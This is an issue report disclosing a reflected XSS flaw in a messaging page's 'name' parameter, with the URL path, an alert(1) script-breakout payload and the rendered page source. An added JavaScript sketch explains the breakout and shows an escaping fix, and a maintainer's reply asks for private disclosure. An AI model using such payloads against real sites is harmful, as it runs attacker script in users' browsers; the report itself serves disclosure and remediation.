Reflected XSS Vulnerability #4010

Closed
BitBitmap opened this Issue Feb 26, 2013 · 1 comment

@BitBitmap

There's a reflected XSS in the window where you send a message to another user.

The URL path is /conversations/new?contact_id=XXX&name= where XXX is a valid contact_id. You can add

</script><script>alert(1);</script>

to name= to execute a reflected XSS attack.

The source would look like this after the XSS:

<script>
  $(document).ready(function () {
    var data = $.parseJSON( "[{\"value\":1719514,\"name\":\"test test\"}]" ),
        autocompleteInput = $("#contact_autocomplete");

    autocompleteInput.autoSuggest(data, {
      selectedItemProp: "name",
      searchObjProps: "name",
      asHtmlID: "contact_ids",
      retrieveLimit: 10,
      minChars: 1,
      keyDelay: 0,
      startText: '',
      emptyText: 'No Results Found',
      preFill: [{name : "</script><script>alert(1)</script>",
                 value : "1719514"}]
      });
    autocompleteInput.focus();
  });
</script>

If needed, I can replicate this attack for you. This reflected XSS does not work in a few browsers like IE and Google Chrome because of XSS filtering.
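Added example, not part of the original report and not the project's code: a sketch of why the rendered source above breaks out of its script block, next to one common way to serialize a user-supplied value for an inline `<script>`. All function names here are hypothetical, and the inputs are the values quoted in the report.

```javascript
// Hypothetical helpers for illustration; not code from the project discussed here.
const ESCAPES = {
  '<': '\\u003c', '>': '\\u003e', '&': '\\u0026',
  '\u2028': '\\u2028', '\u2029': '\\u2029',
};

// JSON.stringify handles quotes and backslashes; the extra escapes keep the
// HTML parser from ever seeing "</script" or "<!--" inside the script body.
function jsonForInlineScript(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (c) => ESCAPES[c]);
}

// "Before": only quotes and backslashes are escaped, which yields the kind of
// rendered source shown in the report.
function renderNaive(name, value) {
  const q = (s) => '"' + String(s).replace(/[\\"]/g, '\\$&') + '"';
  return '<script>\nvar preFill = [{name : ' + q(name) +
         ', value : ' + q(value) + '}];\n</script>';
}

// "After": the whole structure goes through the script-safe serializer.
function renderSafe(name, value) {
  return '<script>\nvar preFill = ' +
         jsonForInlineScript([{ name: String(name), value: String(value) }]) +
         ';\n</script>';
}

// Simplified model of the HTML tokenizer: a script element ends at the first
// "</script" it meets, regardless of JavaScript string quoting. Returns
// whatever markup is left after that first closing tag.
function trailingMarkup(html) {
  const m = /<\/script[\s/>]/i.exec(html);
  if (!m) return '';
  const close = html.indexOf('>', m.index);
  return html.slice(close + 1).trim();
}

// Values taken from the report above.
const reportedName = '</script><script>alert(1);</script>';
console.log('naive leaves markup:', JSON.stringify(trailingMarkup(renderNaive(reportedName, 1719514))));
console.log('safe leaves markup: ', JSON.stringify(trailingMarkup(renderSafe(reportedName, 1719514))));
```

The escaped form is still a valid JavaScript string literal, so the autocomplete pre-fill receives the original text unchanged; it would then need HTML-escaping if it is later inserted into the DOM as markup.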

@jhass

jhass Feb 26, 2013

Member

Thank you for notifying us of this.

However, for the next time we would welcome a more responsible disclosure via any means of non-public communication very much.
